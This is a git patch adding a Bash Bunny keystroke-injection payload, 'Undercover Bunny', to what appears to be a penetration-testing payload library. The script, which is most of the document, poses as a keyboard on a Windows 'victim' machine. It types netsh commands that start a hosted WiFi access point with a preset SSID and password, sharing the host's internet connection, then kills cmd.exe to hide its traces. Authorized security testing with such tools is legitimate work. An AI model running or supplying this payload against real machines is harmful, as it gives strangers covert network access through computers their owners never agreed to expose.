From e06b42b328a92ce12ebf0b417b70cc8b2f8ba35a Mon Sep 17 00:00:00 2001 From: hkessel1 Date: Wed, 12 Apr 2017 13:48:00 -0700 Subject: [PATCH] Create Undercover Bunny Undercover bunny is a Bash Bunny script that creates a wifi network when connected using the hosts internet connection. Added LED's Update Undercover Bunny Rename Undercover Bunny to payload.txt Moved UndercoverBunny into the correct payload folder --- .../remote_access/UndercoverBunny/payload.txt | 73 +++++++++++++++++++ 1 file changed, 73 insertions(+) create mode 100644 payloads/library/remote_access/UndercoverBunny/payload.txt diff --git a/payloads/library/remote_access/UndercoverBunny/payload.txt b/payloads/library/remote_access/UndercoverBunny/payload.txt new file mode 100644 index 00000000..85671ecc --- /dev/null +++ b/payloads/library/remote_access/UndercoverBunny/payload.txt @@ -0,0 +1,73 @@ + + +# Title: Undercover Bunny (it sounds cool) +# Description: Creates a WiFi network that piggyback's off of the victim's current connection using CMD +# Author: hkessel1 +# Version: 1.0 +# Category: General? +# Target: Windows 10 and most likely 7 (CMD) +# Attackmodes: HID + +---------------------------------------- + LEDS +Magenta solid = setting up +White fast = cleaning up +Green 1000ms VERYFAST blink followed by SOLID = you have completed the mission +---------------------------------------- + +################## Options ################### +# Bash Bunny name +bbname=BashBunny + +# Access point name +apname=yummy_bunny + +# Access point password +password=hak5bunny + +# Millaseconds to clean up (and stpo) script after "Start network" is executed (+0.250 seconds) +xeject=120000 + + +################## Options #################### + + + +# Start network +ATTACKMODE HID +LED SETUP +Q GUI r +Q DELAY 200 +Q STRING cmd.exe +Q DELAY 100 +Q ENTER +Q DELAY 100 +Q STRING netsh wlan set hostednetwork mode=allow ssid=$apname key=$password +Q DELAY 200 +Q ENTER +Q DELAY 100 +Q STRING netsh wlan start hostednetwork +Q DELAY 150 +Q ENTER + + +# Begin cleanup +LED CLEANUP +Q GUI r +Q DELAY 100 +Q STRING cmd.exe +Q DELAY 100 +Q ENTER +Q DELAY $xeject +Q ENTER +Q DELAY 100 +Q ENTER +Q DELAY 100 +Q STRING taskkill /IM cmd.exe +Q DELAY 50 +Q ENTER + + + + +LED FINISH